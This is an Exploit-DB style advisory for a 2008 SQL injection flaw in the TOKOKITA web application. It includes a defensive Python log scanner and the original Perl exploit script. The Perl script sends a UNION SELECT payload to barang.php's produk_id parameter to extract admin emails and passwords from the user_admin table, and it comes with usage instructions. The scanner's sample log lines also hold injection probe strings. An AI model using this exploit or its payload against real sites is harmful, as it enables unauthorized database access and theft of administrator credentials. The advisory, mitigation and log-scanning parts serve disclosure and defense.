Vendor: TOKOKITA Web Application
By: k1tk4t
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: TOKOKITA Web Application
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TOKOKITA Multiple Remote SQL Injection

A vulnerability in the TOKOKITA web application allows an attacker to inject arbitrary SQL commands into the application. The 'catlist.php', 'catlist_detail.php' and 'barang.php' scripts do not properly sanitize user-supplied input before using it in an SQL query, so injected SQL commands are executed in the context of the database user. This can be exploited to gain access to the application's database and potentially to sensitive information.

Mitigation:

The vendor has released a patch to address this issue. It is recommended that users upgrade to the latest version of the application.
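
To check whether the three scripts are being probed, web server access logs can be scanned for id parameters that are not plain integers. The following Python is an added example, not part of the original advisory or the vendor's code; it assumes Common/Combined Log Format and that legitimate cat_id and produk_id values are non-negative integers, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> id parameter, as listed in the advisory.
TARGETS = {
    "catlist.php": "cat_id",
    "catlist_detail.php": "cat_id",
    "barang.php": "produk_id",
}

# Assumption: the request line appears quoted, as in Common/Combined Log Format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is a plain non-negative integer.
INT_RE = re.compile(r"[0-9]+")

def suspicious_requests(log_lines):
    """Return (line_no, script, param, decoded_value) for non-integer ids."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = TARGETS.get(script)
        if param is None:
            continue
        # keep_blank_values: an empty id is also worth reporting.
        # Every occurrence is checked, since a repeated parameter can hide one.
        query = parse_qs(url.query, keep_blank_values=True)
        for value in query.get(param, []):
            if not INT_RE.fullmatch(value):
                hits.append((n, script, param, value))
    return hits

# Constructed sample log lines (documentation IP ranges, /toko/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /toko/barang.php?produk_id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /toko/barang.php?produk_id=-9+union+select+null HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /toko/catlist.php?cat_id=3%27 HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /toko/index.php?cat_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Values are reported after URL decoding, so encoded quotes and `+`-separated keywords show up in readable form. Hits indicate probing, not successful exploitation, and should be correlated with response sizes and the patch status of the host.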

Exploit-DB raw data:

#!/usr/bin/perl
# k1tk4t Public Security Advisory
# ////////////////////////////////////////////////////////////
# TOKOKITA Multiple Remote SQL Injection 
# Demosite	: http://www.tokokita.net/toko/
# Vendor	: http://www.tokokita.com/
# Bugs		: 1. catlist.php?cat_id=[Blind SQLi]
#		  2. catlist_detail.php?cat_id=[Blind SQLi]
#	          3. barang.php?produk_id=[SQLi]
# Thanks to:
# str0ke,DNX,n0c0py,L41n,
# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
# eCHo->[y3dips,K-159,lirva32,and other staff]
use LWP::UserAgent;

if ( !$ARGV[1] ) {
	print "\n //////////////////////////////////////////////////////////////////";
	print "\n //                      ..::> k1tk4t <::..                      //";
	print "\n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //";
	print "\n //////////////////////////////////////////////////////////////////";
	print "\n[!] ";
	print "\n[!] Penggunaan : perl tokokita.pl [Site] [Path]";
	print "\n[!] Contoh     : perl tokokita.pl localhost /toko/";
	print "\n[!] ";
	print "\n";
	exit;
}
$site   = $ARGV[0];
$path   = $ARGV[1];
$sqlinj = "union+
select+
null,
null,
null,
concat(0x6b3174,email,0x316e),
null,
concat(0x6b3474,password,0x307574),
null,
null,
null,
null,
null+
from+
user_admin/*";    
$expl = "http://" . $site . $path . "barang.php?produk_id=-9+"
. $sqlinj;
$www  = new LWP::UserAgent;
print "\n\n [!] Injeksi SQL \n";
$res = $www->get($expl) or err ();
$hasil = $res->content;
if ( $hasil =~ /k1t(.*?)1n/ ) {
	print "\n [+] Username      : $1";
	$hasil =~ /k4t(.*?)0ut/, print "\n [+] Password      : $1";
	print "\n\n";
} 
else {
	print "\n [-] Exploit gagal ;)";
	exit();
}

# milw0rm.com [2008-06-24]